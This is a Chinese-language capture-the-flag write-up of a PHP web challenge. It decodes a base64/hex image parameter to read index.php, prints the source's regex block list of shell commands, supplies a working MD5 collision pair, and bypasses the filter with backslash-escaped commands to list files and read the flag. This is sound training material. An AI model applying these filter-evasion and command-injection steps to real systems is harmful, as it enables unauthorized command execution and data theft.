今天玩ctf遇见一个比较有意思的题。闲来无事分享分享。
启动靶机后来到这个页面
web大法第一步,右键源代码,发现了一堆base64编码。
点击后发现就是主页面左上角的图片的内容经过编码后的呈现。似乎没什么作用
然后又拿着后台扫描工具一顿乱扫什么也没发现。。。
然后注意到参数自带“&cmd=”,尝试输入命令ls
forbid!!!看来确实存在cmd参数,并且ls命令被过滤了。尝试dir命令
似乎dir没被过滤,但是仍然没有显示,只要不触发关键字都是“md5 is funny”,所以猜测这里无法回显。
然后奇葩的来了,尝试其他方法找不到破绽。
“?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=”,img的值像不像base64编码。。。
对"TXpVek5UTTFNbVUzTURabE5qYz0&cmd="进行base64解码"MzUzNTM1MmU3MDZ1Njc=>rg@",再次base64解码得到一串字符串,这是经过hex编码的。解码后就是 555.png。带着555.png去访问,发现仍然是主页面左上角的图片。
这里大概就可以理解了,可能存在一个文件包含,并将内容编码呈现出来。这里也没其他内容,直接读取index.php
index.php->hex编码->base64->base64->"TmprMlpUWTBOalUzT0RKbE56QTJPRGN3"
直接访问,右键源代码,将呈现出来的内容进行解码
';
die("xixi锝?no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "
";
echo "
";
}
echo $cmd;
echo "
";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "
";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>
img参数应该不太可能实现了。。。分析cmd参数吧
1.这里注意echo `$cmd`,它的意思是将$cmd作为命令执行并输出。所以这里可以执行命令
2.这里过滤了许多,重点在这"|\\|\\\\|",php中会经历两次解析,php解析与正则解析。第一次php转义为"|\|\\|",第二次正则转义,将中间的|转义为普通字符,结果为"||\|"。所以实际上匹配的是"|\"。它没有过滤"\"符号。
3.md5碰撞,因为这里有string。没有办法再用数组和科学计数法的方法,所以只能使用真实的碰撞。
a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
分析完后进行抓包,构造payload
ok,md5成功绕过。dir命令执行成功。最后一步读取flag。
l\s /
已经看见flag了,只需要cat就行了
ca\t /flag
这题第一步真的难想到,那个cmd可以传参同时也是base64编码。妙啊